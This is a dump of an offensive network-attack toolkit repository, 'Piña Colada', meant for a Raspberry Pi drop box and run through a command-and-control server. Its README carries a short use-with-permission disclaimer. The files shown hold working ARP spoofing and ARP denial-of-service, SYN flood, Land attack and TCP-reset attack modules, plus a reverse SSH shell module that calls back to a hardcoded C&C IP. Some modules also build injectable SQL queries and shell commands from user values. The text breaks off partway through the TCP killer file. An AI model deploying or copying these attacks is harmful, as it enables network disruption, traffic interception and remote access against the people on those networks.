├── .travis.yml
├── LICENSE
├── README.md
├── app
    └── App Command Writeup.txt
├── capabilities
    ├── __init__.py
    ├── arp
    │   ├── arpDos.py
    │   ├── arpSpoof.py
    │   └── util_arp.py
    ├── auxiliary
    │   ├── reverse_shell.py
    │   └── wifi_connect.py
    ├── capability.py
    ├── dos
    │   ├── land.py
    │   ├── syn.py
    │   └── tcpkiller.py
    ├── exploitation
    │   ├── dnsSpoof.py
    │   ├── ms08.py
    │   ├── sslstrip.py
    │   └── util_arp.py
    ├── interface.py
    ├── option.py
    ├── scan
    │   ├── nmapScan.py
    │   └── syn.py
    ├── sniff
    │   └── sniffPack.py
    └── template.py
├── cert
    ├── server.crt
    ├── server.csr
    ├── server.key
    └── server.orig.key
├── cli.py
├── client.py
├── core.py
├── network.py
├── pinacolada_website
    ├── __init__.py
    ├── static
    │   ├── background.gif
    │   ├── bootstrap.min.css
    │   ├── bootstrap.min.js
    │   ├── cover.css
    │   ├── jquery-terminal.min.js
    │   ├── jquery.min.js
    │   └── tether.min.js
    ├── templates
    │   ├── 404.html
    │   └── index
    │   │   ├── command.html
    │   │   ├── index.html
    │   │   └── terminal.html
    └── views
    │   ├── __init__.py
    │   └── index.py
├── pip_dependencies
├── scans.py
├── server.py
├── setup
├── setup_postgres.py
├── test_client.py
└── tests.py


/.travis.yml:
--------------------------------------------------------------------------------
 1 | language: python
 2 | sudo: required
 3 | dist: xenial
 4 | python:
 5 |      - "2.7"
 6 | install:
 7 |      - pip install -r pip_dependencies
 8 |      - sudo pip install -r pip_dependencies
 9 |      - sudo -H ./setup
10 | script: sudo nosetests -vv --nocapture 
11 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2016 ecthros
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Piña Colada ![Build Status](https://travis-ci.org/ecthros/pina-colada.svg?branch=master)
  2 | 
  3 | Piña Colada, a powerful and extensible wireless drop box, capable of performing a wide range of remote offensive attacks on a network. It can be controlled via it's command line interface, or connect to it's Command and Control remote server to be controlled remotely, either by web application or Android app.
  4 | 
  5 | Please only use Piña Colada with explicit permission - please don't hack without asking.
  6 | 
  7 | [Watch some controlled attacks here.](https://www.youtube.com/playlist?list=PL22Ei9kfayhao0qeotVvlkRtfSRSMGoLq)
  8 | 
  9 | ## General Usage
 10 | Piña Colada comes with a number of built-in capabilities, and more can be dynamically added at any time. "Capabilities" are simply modules written to accomplish a task, such as a ARP Spoofing, DNS Poisoning, DOSing a user, etc. Piña Colada can be controlled using a familiar Metasploit like interface ("use" engages a capability, option setting works the same, etc), and is both quick to deploy and easy to use. 
 11 | 
 12 | To start Piña Colada, first ensure that you have the required dependencies. [Scapy](http://www.secdev.org/projects/scapy/) is the backbone of the project, so make sure you install it before running. More dependencies may be added as the project is extended, so make sure your installation remains up to date as it's updated. An automatic deployment package is coming soon. 
 13 | 
 14 | Launching Piña Colada:
 15 | ```
 16 | $ sudo python cli.py
 17 |     ____  _  /\//          ______      __          __        ' .
 18 |    / __ \(_)//\/ ____ _   / ____/___  / /___ _____/ /___ _   \~~~/
 19 |   / /_/ / / __ \/ __ `/  / /   / __ \/ / __ `/ __  / __ `/    \_/
 20 |  / ____/ / / / / /_/ /  / /___/ /_/ / / /_/ / /_/ / /_/ /      Y
 21 | /_/   /_/_/ /_/\__,_/   \____/\____/_/\__,_/\__,_/\__,_/      _|_
 22 | Welcome to Pina Colada, a powerful Wifi Drop Box. Type "help" to see the list of available commands.
 23 | >>
 24 | ```
 25 | 
 26 | ## Controlling the Pi (CLI)
 27 | 
 28 | Piña Colada has a number of commands that enable to you to control different aspects about the pi and the network. 
 29 | 
 30 | **Enabling/disabling Promiscuous Mode:**
 31 | ```
 32 | >> promisc enable
 33 | + Promiscuous Mode enabled for interface eth0.
 34 | ```
 35 | 
 36 | **Controlling operating interface:**
 37 | ```
 38 | >> interface eth0
 39 |  + Successfully changed interface to eth0. Using local IP 10.0.0.56.
 40 | ```
 41 | 
 42 | **Enumerating the Network:**
 43 | ```
 44 | >> discover
 45 | Begin emission:
 46 | Finished to send 256 packets.
 47 | 
 48 | Received 0 packets, got 0 answers, remaining 256 packets
 49 | ID	IP		MAC			Ports	Last Date
 50 | 61	10.0.0.1	00:0c:29:5f:e7:50		2016-11-01 15:34:40
 51 | 62	10.0.0.32	d0:50:99:86:92:1a		2016-11-01 03:23:21
 52 | 63	10.0.0.34	80:2a:a8:80:b1:82		2016-11-01 15:34:40
 53 | ...
 54 | >> 
 55 | ```
 56 | 
 57 | **Executing Commands:**
 58 | 
 59 | Piña Colada also operates as a fall-through shell. For example:
 60 | ```
 61 | >> netstat -plant
 62 |  + Executing "netstat -plant"
 63 | Active Internet connections (servers and established)
 64 | Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 65 | tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      605/sshd
 66 | ...
 67 | >> msfconsole
 68 |        =[ metasploit v4.12.32-dev                         ]
 69 | + -- --=[ 1587 exploits - 905 auxiliary - 273 post        ]
 70 | + -- --=[ 457 payloads - 39 encoders - 8 nops             ]
 71 | + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 72 | 
 73 | msf > quit
 74 | >> 
 75 | ```
 76 | 
 77 | ## Capabilities
 78 | 
 79 | Out of the box, Piña Colada comes with many, many capabilities, and more can be added dynamically at any time. These capabilities are organized into the following categories:
 80 | 
 81 | 1. Denial of Service (DOS)
 82 | 2. ARP
 83 | 3. Sniffing
 84 | 4. Exploitation
 85 | 5. Scanning
 86 | 6. Auxiliary Attacks
 87 | 
 88 | To see a full list of available capabilities, run "list": 
 89 | 
 90 | ```
 91 | >> list
 92 |  + Available capabilities:
 93 |   + auxiliary
 94 |    - reverse_shell
 95 |   + dos
 96 |    - syn
 97 |    - land
 98 |    - [tcpkiller](https://github.com/Kkevsterrr/tcpkiller)
 99 |   + arp
100 |    - arpSpoof
101 |    - arpDos
102 |   + sniff
103 |    - sniffPack
104 |   + exploitation
105 |    - dnsSpoof2
106 |    - ms08
107 |    - dnsSpoof
108 |   + scan
109 |    - syn
110 |    - nmapScan
111 |    ...
112 | >>
113 | ```
114 | 
115 | To engage a capability for use, simply use the command "use":
116 | 
117 | ```
118 | >> use dos/syn
119 | (Syn Flood) >>
120 | ```
121 | 
122 | Once a capability has been loaded, you can view options using a familiar "show options", and set each option by simply running "set <OPTION> <VALUE>":
123 | ```
124 | >> set port 12345 
125 |  + port => 12345
126 | ```
127 | 
128 | #### Persistence
129 | 
130 | Once loaded, all capabilities are persistent within Piña Colada's interface. This allows for multiple capabilities to be engaged simultaneously, and seamlessly transition between them. 
131 | ```
132 | >> use dos/syn
133 | (Syn Flood) >> launch
134 |  + Launching Syn Flood...
135 | Type 'restore' when ready to stop the attack.
136 | (Syn Flood) >> quit
137 | >> use dos/land
138 | (Land Attack) >> launch
139 |  + Launching Land Attack
140 |  Sent 2000 packets.
141 | >> use dos/syn
142 | (Syn Flood) >> restore
143 |  + Restoring target...
144 | ```
145 | Even as the land attack is engaged, the syn flood is still operating in the background.
146 | 
147 | #### Interface
148 | 
149 | Additionally, Piña Colada supports full autocomplete of all capabilities (including recursively through depth), so you can start typing the following: 
150 | ```
151 | >> use rever<tab>
152 | ```
153 | immediately autocompletes to: 
154 | ```
155 | >> use auxiliary/reverse_shell
156 | ```
157 | 
158 | Making it easy and fast to load arbitrary capapbilities quickly. 
159 | 
160 | #### Extensibility
161 | 
162 | More capabilities can be added to Piña Colada at any time, even during runtime. A [template](https://github.com/ecthros/pina-colada/blob/master/capabilities/template.py) capability file is included in the capabilities folder for rapid development - simply copy the file and move it into one of the categories. It is automatically and dynamically available for use in the command line interface or web terminal, and can be deployed at any time. 
163 | 
164 | ## Server Capability
165 | 
166 | Piña Colada also contains a Command and Control server functionality to allow it be controlled remotely. This drop box functionality is especially useful when Piña Colada is deployed on a Raspberry Pi. To deploy the server on a remote location, run the following:
167 | 
168 | ```
169 | $ python server.py
170 | [*] Starting web sever...
171 | [*] PinaColada startup successful - listening on 0.0.0.0:9999
172 | [*] Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
173 | ```
174 | 
175 | The server is now listening for connections and it's web server is accessible. In order to use the functionality of the command and control server, the pi must be connected. On the pi, run: 
176 | 
177 | ```
178 | $ sudo python client.py
179 | Initializing Network DB...
180 | [*] Attempting to connect to server
181 | [*] Successfully connected.
182 | ```
183 | 
184 | The server will also acknoledge a succesful connection: 
185 | ```
186 | [*] Pina Colada has connected.
187 | ```
188 | 
189 | The web server runs on port 5000, so going to the IP address of the server <IP>:5000 gives you a drop web terminal into the pi. This works by tunneling commands to the client into the command line interface. The CnC server also allows for the android app to connect to the pi for control. All of this communication is encrypted to prevent from eavesdropping or MITM attacks against the pi. 
190 | 
191 | ### Encryption
192 | 
193 | All communication to and from the pi are encrypted using AES/CBC/PKCS#5 encryption. Keys are negotiated via the Diffie-Hellman protocol upon connection to the pi. All tunneling through the CnC server is also encrypted for protection and prevention of a MITM attack. 
194 | 
195 | ## Contributing
196 | Piña Colada is still very much in its infancy! Feel free to contribute to the project - simply fork it, make your changes, and issue a pull request. Have an idea for a killer capability, or something we could improve? Make an issue and we'll add it ASAP!
197 | 
198 | If you wish to add your own capability, follow the directions given in the pina-colada/capabilities/template.py file.
199 | 


--------------------------------------------------------------------------------
/app/App Command Writeup.txt:
--------------------------------------------------------------------------------
 1 | Not functioning as of 12/6
 2 | 
 3 | All commands are reverted by sending the command
 4 | 	"restore"
 5 | 
 6 | Arp Dos:
 7 | 	send-> 	arpdos:source->list of source ips separated by ":"
 8 | 			arpdos:masq->list of masq ips separated by ":"
 9 | 			arpdos:dest->list of dest ips separated by ":"
10 | 	command->
11 | 		arpdos:<masq>:<source>:<dest>
12 | 		
13 | Arp Spoof:
14 | 	send-> 	arpspoof:source->list of source ips separated by ":"
15 | 			arpspoof:masq->list of masq ips separated by ":"
16 | 			arpspoof:dest->list of dest ips separated by ":"
17 | 	command->
18 | 		arpspoof:<masq>:<source>:<dest>
19 | 		
20 | DNS Spoof:
21 | 	send->	dnsspoof:target->list of target ips separated by ":"
22 | 	
23 | 	command->
24 | 		dnsspoof:<target>:<site>:<newSite>
25 | 		
26 | DOS Land:
27 | 	send->	dosland:target->list of target ips separated by ":"
28 | 	
29 | 	command->
30 | 		dosland:<port>:<target>:<site>
31 | 
32 | DOS Syn DOS:
33 | 	send->	dossyndos:target->list of target ips separated by ":"
34 | 	
35 | 	command->
36 | 		dossyndos:<port>:<target>:<interval>:<threads>:<verbose>
37 | 		
38 | MS08 Exploit:
39 | 	send->	ms08exploit:target->list of target ips separated by ":"
40 | 	
41 | 	command->
42 | 		ms08exploit:<port>:<target>:<version>
43 | 		version is 1 for win2000 or 2 or winxp
44 | 		
45 | NMap Scan:
46 | 	send->	nmapscan:host->list of hosts separated by ":"
47 | 	
48 | 	command->
49 | 		nmapscan:<host>:<portmin>:<portmax>
50 | 
51 | ReverseShell:
52 | 	send->	reverseshell:master->list of master ips separated by ":"
53 | 	
54 | 	command->
55 | 		reverseshell:<master>:<localport>:<username>:<remoteport>:<publickey>
56 | 
57 | SniffPack:
58 | 	send-> nothing
59 | 	
60 | 	command->
61 | 		sniffpack:<rate>:<folder>
62 | 		
63 | SynScan:
64 | 	send-> 	synscan:target->list of target ips separated by ":"
65 | 	
66 | 	command->
67 | 		synscan:<target>:<portmin>:<portmax>
68 | 		
69 | 
70 | 		
71 | 		
72 | 		
73 | 		
74 | 


--------------------------------------------------------------------------------
/capabilities/__init__.py:
--------------------------------------------------------------------------------
1 | from capability import *
2 | from interface import *
3 | 


--------------------------------------------------------------------------------
/capabilities/arp/arpDos.py:
--------------------------------------------------------------------------------
 1 | from util_arp import *
 2 | import os
 3 | from capability import *
 4 | 
 5 | #masq_ip: ip we masquerade as.
 6 | #masc_mac: Masqueraded mac address
 7 | #source_mac: Our mac address
 8 | #Dest IP: target ip
 9 | #Dest Mac: target mac address
10 | #ex: arpSpoof("10.0.0.1", "00:0c:29:5f:e7:50", "b8:27:eb:c2:1c:52", "10.0.0.57", "00:0c:29:08:45:1a")
11 | class arpDos(Capability):
12 | 
13 |     def __init__(self, core):
14 |         super(arpDos, self).__init__(core)
15 |         self.name = "Arp Dos"
16 |         '''self.options = {
17 |             "masq_ip"   : Option("masq_ip", "", "IP to Masquerade as", True),
18 |             "masq_mac"   : Option("masq_mac", "", "MAC to Masquerade as", True),
19 |             "source_mac"   : Option("source_mac", "", "Mac Address to send traffic to", True),
20 |             "dest_ip"   : Option("dest_ip", "", "IP address of target", True),
21 |             "dest_mac"   : Option("dest_mac", "", "Mac address of target", True),
22 |         }'''
23 |         self.options = {
24 |             "masq" : Option("masq", "", "ID of the computer to masquerade as", True),
25 |             "source": Option("source", "", "ID of the source computer", True),
26 |             "dest": Option("dest", "", "ID of the target", True),
27 |             }
28 |         self.help_text = INFO + "Spoof the arp table of a target with our ip. We will not forward their traffic, effectively DOSsing them."
29 |     
30 |     def exec_command(self, comm):
31 |         self.core.cur.execute(comm)
32 |         return self.core.cur.fetchall()[0][0]
33 |     
34 |     def getVars(self):
35 |         self.masq_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
36 |         self.masq_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
37 |         self.source_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
38 |         self.source_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
39 |         self.dest_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
40 |         self.dest_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
41 | 
42 |     def arpGo(self):
43 |         os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
44 |         return arpBegin(self.masq_ip, self.masq_mac, self.source_mac, self.dest_ip, self.dest_mac)
45 |    
46 |     def restore(self):
47 |         self.getVars()
48 |         self.proc.terminate()
49 |         arpEnd(self.masq_ip, self.masq_mac, self.dest_ip, self.dest_mac)
50 | 
51 |     def launch(self):
52 |         self.getVars()
53 |         self.proc = self.arpGo()
54 |         return self.proc
55 |         
56 | 


--------------------------------------------------------------------------------
/capabilities/arp/arpSpoof.py:
--------------------------------------------------------------------------------
 1 | from util_arp import *
 2 | import os
 3 | from capability import *
 4 | 
 5 | #masq_ip: ip we masquerade as.
 6 | #masc_mac: Masqueraded mac address
 7 | #source_mac: Our mac address
 8 | #Dest IP: target ip
 9 | #Dest Mac: target mac address
10 | #ex: arpSpoof("10.0.0.1", "00:0c:29:5f:e7:50", "b8:27:eb:c2:1c:52", "10.0.0.57", "00:0c:29:08:45:1a")
11 | #ex:
12 | #set masq_ip "10.0.0.1"
13 | #set masq_mac "00:0c:29:5f:e7:50"
14 | #set source_mac "b8:27:eb:c2:1c:52"
15 | #set dest_ip "10.0.0.57"
16 | #set dest_mac "00:0c:29:08:45:1a"
17 | 
18 | class arpSpoof(Capability):
19 | 
20 |     def __init__(self, core):
21 |         super(arpSpoof, self).__init__(core)
22 |         self.name = "Arp Spoof"
23 |         self.options = {
24 |             "masq" : Option("masq", "", "ID of the computer to masquerade as", True),
25 |             "source": Option("source", "", "ID of the source computer", True),
26 |             "dest": Option("dest", "", "ID of the target", True),
27 |             }
28 |         self.help_text = INFO + "Spoof the arp table of a target with our ip. By forwarding their traffic, we can see all their traffic."
29 | 
30 |     def exec_command(self, comm):
31 |         self.core.cur.execute(comm)
32 |         return self.core.cur.fetchall()[0][0]
33 | 
34 |     def getVars(self):
35 |         self.masq_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
36 |         self.masq_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
37 |         self.source_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
38 |         self.source_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
39 |         self.dest_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
40 |         self.dest_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
41 | 
42 |     def arpGo(self):
43 |         os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
44 |         return arpBegin(self.masq_ip, self.masq_mac, self.source_mac, self.dest_ip, self.dest_mac)
45 |     
46 |     def restore(self):
47 |         self.getVars()
48 |         self.proc.terminate()
49 |         arpEnd(self.masq_ip, self.masq_mac, self.dest_ip, self.dest_mac)
50 | 
51 | 
52 |     def launch(self):
53 |         self.getVars()
54 |         self.proc = self.arpGo()
55 |         return self.proc
56 | 


--------------------------------------------------------------------------------
/capabilities/arp/util_arp.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | import subprocess
 3 | import os
 4 | import multiprocessing
 5 | #masq_ip: ip we masquerade as.
 6 | #masc_mac: Masqueraded mac address
 7 | #source_mac: Our mac address
 8 | #Dest IP: target ip
 9 | #Dest Mac: target mac address
10 | #ex: arpDos("10.0.0.1", "00:0c:29:5f:e7:50", "b8:27:eb:c2:1c:52", "10.0.0.57", "00:0c:29:08:45:1a")
11 | 
12 | def arpSend(masq_ip, masq_mac, source_mac, dest_ip, dest_mac):
13 |     packet = ARP()
14 |     packet.op = 2
15 |     packet.psrc = masq_ip
16 |     packet.pdst = dest_ip
17 |     packet.hwdst = dest_mac
18 |     packet.hwsrc = source_mac
19 |     send(packet)
20 |     while True:
21 |         send(packet)
22 |         sniff(filter="arp and host " + masq_ip, count=1)
23 | 
24 | def arpBegin(masq_ip, masq_mac, source_mac, dest_ip, dest_mac):
25 |     proc= multiprocessing.Process(target=arpSend, args=(masq_ip, masq_mac, source_mac, dest_ip, dest_mac))
26 |     proc.start()
27 |     return proc
28 | 
29 | def arpEnd(masq_ip, masq_mac, dest_ip, dest_mac):
30 |     packet = ARP()
31 |     packet.op = 2
32 |     packet.psrc = masq_ip
33 |     packet.pdst = dest_ip
34 |     packet.hwdst = dest_mac
35 |     packet.hwsrc = masq_mac
36 |     send(packet)
37 | 


--------------------------------------------------------------------------------
/capabilities/auxiliary/reverse_shell.py:
--------------------------------------------------------------------------------
 1 | from capability import *
 2 | import pexpect
 3 | import getpass
 4 | import os
 5 | import sys
 6 | 
 7 | class Reverse(Capability):
 8 | 
 9 |     def __init__(self, core):
10 |         super(Reverse, self).__init__(core)
11 |         self.name = "Reverse Shell"
12 |         self.intro = GOOD + "Using Reverse Shell module..."
13 |         self.core = core
14 |         self.options = {
15 |             "master": Option("master", "129.2.204.176", "ip address of C&C server", True), # self.core.cnc
16 |             "local_port": Option("local_port", "19999", "local port to reverse to", True),
17 |             "username": Option("username", "aces", "username for SSH on C&C server", True),
18 |             "remote_port": Option("remote_port", "13337", "local port to reverse to", True),
19 |             "public_key": Option("public_key", "~/.ssh/id_rsa.pub", "RSA Key for passwordless login", True)
20 |         }
21 |         self.help_text = "Opens a reverse shell to the C&C server"
22 |         self.proc = None
23 | 
24 |     def restore(self):
25 |         sys.stdout.write(GOOD)
26 |         sys.stdout.flush()
27 |         os.system("ssh -S cntrl -O exit %s@%s" % (self.get_value("username"), self.get_value("master")))
28 | 
29 |     def launch(self):
30 |         self.proc = pexpect.spawn("ssh -M -S cntrl -f -N -R %s:localhost:22 %s@%s -p %s" % (self.get_value("local_port"), self.get_value("username"), self.get_value("master"), self.get_value("remote_port")))
31 |         self.proc.expect("word: ")
32 |         pw = getpass.getpass()
33 |         self.proc.sendline(pw)
34 |         self.proc.expect(pexpect.EOF)
35 |         print GOOD + "Reverse shell initiated."
36 | 
37 | 
38 | 
39 | 
40 | 


--------------------------------------------------------------------------------
/capabilities/auxiliary/wifi_connect.py:
--------------------------------------------------------------------------------
 1 | from capability import *
 2 | from os import *
 3 | 
 4 | class wifi_connect(Capability):
 5 | 
 6 |     def __init__(self, core):
 7 |         super(wifi_connect, self).__init__(core)
 8 |         self.name = "Wifi Connect"
 9 |         self.intro = GOOD + "Using Wifi Connection module..."
10 |         self.core = core
11 |         self.options = { 
12 |                 #example: "hi":  Option("hi", "default", description", True),
13 |                     "ssid":     Option("ssid", "", "SSID to connect to", True),
14 |                     "password": Option("password", "", "Password to use", True),
15 |                 }
16 |         self.help_text = "Allows you to connect to wifi."
17 | 
18 |     def restore(self):
19 |         os.system("nmcli dev disconnect wlan0")
20 | 
21 |     def launch(self):
22 |         if self.get_value("password") == "":
23 |             os.system("nmcli dev wifi connect " + str(self.get_value("ssid")))
24 |         else:
25 |             os.system("nmcli dev wifi connect " + str(self.get_value("ssid")) + " password " + str(self.get_value("password")))
26 | 


--------------------------------------------------------------------------------
/capabilities/capability.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import sys
 3 | 
 4 | from option import *
 5 | from colorama import *
 6 | 
 7 | GOOD = Fore.GREEN + " + " + Fore.RESET
 8 | BAD = Fore.RED + " - " + Fore.RESET
 9 | WARN = Fore.YELLOW + " * " + Fore.RESET
10 | INFO = Fore.BLUE + " + " + Fore.RESET
11 | 
12 | class Capability(object):
13 |     def __init__(self, core):
14 |         self.options = {}
15 |         self.core = core
16 |         self.help_text = None
17 |     
18 |     def set_option(self, option, value):
19 |         if option in self.options.keys():
20 |             self.options[option].value = value
21 |             return True
22 |         else:
23 |             return False
24 | 
25 |     def launch(self):
26 |         return False
27 |     
28 |     def restore(self):
29 |         return False
30 | 
31 |     def exec_command(self, comm):
32 |         self.core.cur.execute(comm)
33 |         return self.core.cur.fetchall()[0][0]
34 | 
35 |     def get_value(self, name):
36 |         if name in self.options:
37 |             return self.options[name].value
38 |         else:
39 |             return None
40 |     
41 |     def get_options(self):
42 |         return self.options
43 | 
44 | 


--------------------------------------------------------------------------------
/capabilities/dos/land.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import IP, TCP, send
 2 | from capability import *
 3 | 
 4 | class Land(Capability):
 5 |     def __init__(self, core):
 6 |         super(Land, self).__init__(core)
 7 |         self.name = "Land Attack"
 8 |         self.options = {
 9 |                 "port"   : Option("port", 135, "port to attack", True),
10 |                 "target" : Option("target", "0.0.0.0", "machine to target", True),
11 |                 "size" : Option("size", 2000, "how loud (and effective) the attack is", False)
12 |                 }
13 |         self.help_text = INFO + "Launches a Land DOS flood attack packet."
14 | 
15 |     def launch(self):
16 |         send(IP(src=self.get_value("target"), dst=self.get_value("target"))/TCP(sport=self.get_value("port"), dport=self.get_value("port")), count=self.get_value("size"))
17 | 


--------------------------------------------------------------------------------
/capabilities/dos/syn.py:
--------------------------------------------------------------------------------
 1 | from capability import *
 2 | from scapy.all import *
 3 | import multiprocessing
 4 | 
 5 | class Syn(Capability):
 6 |     
 7 |     def __init__(self, core):
 8 |         super(Syn, self).__init__(core)
 9 |         self.name = "Syn Flood"
10 |         self.options = {
11 |                 "port"   : Option("port", 80, "port to flood", True),
12 |                 "target" : Option("target", "", "IP of target to attack", True),
13 |                 "inter"  : Option("inter", 0.3, "Interval between sending packets", True),
14 |                 "threads": Option("threads", 3, "Number of threads", True),
15 |                 "verbose": Option("verbose", 1, "Verbosity - 3 will show all packets", True),
16 |                 }
17 |         self.help_text = INFO + "Sends tons of packets to an IP in the hopes of DOSing the computer." 
18 | 
19 |     def exec_command(self, comm):
20 |         self.core.cur.execute(comm)
21 |         return self.core.cur.fetchall()[0][0]
22 | 
23 |     def flood(self):
24 |         p = IP(dst=self.get_value("target"), id=1111, ttl=99)/TCP(sport=RandShort(), dport=int(self.get_value("port")), seq=12345, ack=1000, window=1000, flags="S")/"Payload"
25 |         ans, unans = srloop(p, inter=float(self.get_value("inter")), retry=2, timeout=4, verbose=int(self.get_value("verbose")))
26 |     
27 |     def launch(self):
28 |         self.threads = []
29 |         print "Type 'restore' when ready to stop the attack.'"
30 |         for i in range(1, int(self.get_value("threads"))+1):
31 |             #print "Beginning thread" + str(i)
32 |             self.threads.append(multiprocessing.Process(target=self.flood, args=()))
33 |             self.threads[i-1].start()
34 | 
35 |     def restore(self):
36 |         for i in range(1, int(self.get_value("threads"))+1):
37 |             self.threads[i-1].terminate()
38 |             #print "Terminating thread " + str(i)
39 | 


--------------------------------------------------------------------------------
/capabilities/dos/tcpkiller.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | import binascii
  4 | import socket
  5 | import struct
  6 | import argparse
  7 | import sys
  8 | import logging
  9 | import os
 10 | import traceback
 11 | import socket
 12 | 
 13 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 14 | from scapy.all import Ether, IP, IPv6, TCP, sendp, conf, sniff
 15 | from random import randint
 16 | from capability import *
 17 | from colorama import *
 18 | from interface import *
 19 | 
 20 | def args_error():
 21 |     print BAD + "Invalid parameters."
 22 | 
 23 | 
 24 | def validate_ips(ips):
 25 |     clean = []
 26 |     if ips is None or not isinstance(ips, list):
 27 |         return []
 28 |     for ip in ips:
 29 |         if "," in ip:
 30 |             ips += filter(None, ip.split(","))
 31 |         else:
 32 |             try:
 33 |                 socket.inet_aton(ip)
 34 |             except Exception as e:
 35 |                 print e
 36 |                 print("error: invalid ip address \"%s\", exiting." % ip)
 37 |                 return None
 38 |         clean.append(ip)
 39 |     return clean
 40 | 
 41 | 
 42 | def is_int(s):
 43 |     try: 
 44 |         int(s)
 45 |         return True
 46 |     except ValueError:
 47 |         return False
 48 | 
 49 | 
 50 | def validate_ports(ports):
 51 |     clean = []
 52 |     if ports is not None:
 53 |         for port in ports:
 54 |             if "," in port:
 55 |                 ports += port.split(",")
 56 |             elif "-" in port:
 57 |                 low, high = port.split("-")
 58 |                 if not is_int(low) or not is_int(high):
 59 |                     print("error: invalid port range \"%s\", exiting." % port)
 60 |                     return None
 61 |             elif not is_int(port):
 62 |                 return None
 63 |             clean.append(port)
 64 |         return clean
 65 |     return []
 66 | 
 67 | 
 68 | def validate_args(args):
 69 |     for arg in ["allow", "allow_source", "allow_destination", "target", "target_source", "target_destination"]:
 70 |         if arg in args and args[arg] is not None and not validate_ips(args[arg]):
 71 |             args_error()
 72 |     for arg in ["allow_port", "allow_source_port", "allow_destination_port", "target_port", "target_source_port", "target_destination_port"]: 
 73 |         if arg in args and args[arg] is not None and not validate_ports(args[arg]):
 74 |             args_error()
 75 | 
 76 | 
 77 | class TCPKiller(Capability):
 78 | 
 79 |     def __init__(self, core):
 80 |         super(TCPKiller, self).__init__(core)
 81 |         self.name = "TCPKiller"
 82 |         self.core = core
 83 |         self.options = {
 84 |             "interface":                Option("interface", "eth0", "interface to act upon", True),
 85 |             "allow":                    Option("allow", self.core.localIP, "do not attack this ip address's connections, whether it's the source or destination of a packet", False),
 86 |             "allow_source":             Option("allow-source", False, "do not attack this ip address's connections, but only if it's the source of a packet", False),
 87 |             "allow_destination":        Option("destination-source", False, "do not attack this ip address's connections, but only if it's the destination of a packet", False),
 88 |             "target":                   Option("target", "0.0.0.0", "actively target given ip address, whether it is the source or destination of a packet", False),
 89 |             "target_source":            Option("target-source", "0.0.0.0", "actively target this ip address, but only if it's the source of a packet", False),
 90 |             "target_destination":       Option("target-destination", "0.0.0.0", "actively target this ip address, but only if it's the destination of a packet", False),
 91 |             "allow_port":               Option("allow-port", None, "do not attack any connections involving this port, whether it's the source or destination of a packet", False),
 92 |             "allow_source_port":        Option("allow-source-port", None, "do not attack any connections involving this port, but only if it's the source of a packet", False),
 93 |             "allow_destination_port":   Option("allow-source-port", None, "do not attack any connections involving this port, but only if it's the destination of a packet", False),
 94 |             "target_port":              Option("target-port", None, "actively target any connections involving these ports whether it is the source or destination of a packet", False),
 95 |             "target_source_port":       Option("target-source-port", None, "actively target any connections involving this port, but only if it's the source", False),
 96 |             "target_destination_port":  Option("target-source-port", None, "actively target any connections involving this port, but only if it's the destination", False),
 97 |             "noisy":                    Option("noisy", False, "sends many more packets to attempt connection resets to increase effectiveness", False),
 98 |             "randomize":                Option("randomize", "all", "target only SOME of the matching packets for increased stealthiness", False),
 99 |             "verbose":                  Option("verbose", "True", "verbose output", False)
100 |         }
101 |         self.help_text = INFO + "Forges TCP reset packets to hangup all ipv4 tcp connections"
102 | 
103 |     def setup(self):
104 |         args = {}
105 |         for opt in self.options:
106 |             args[opt] = self.get_value(opt)
107 |         self.iface = args["interface"]
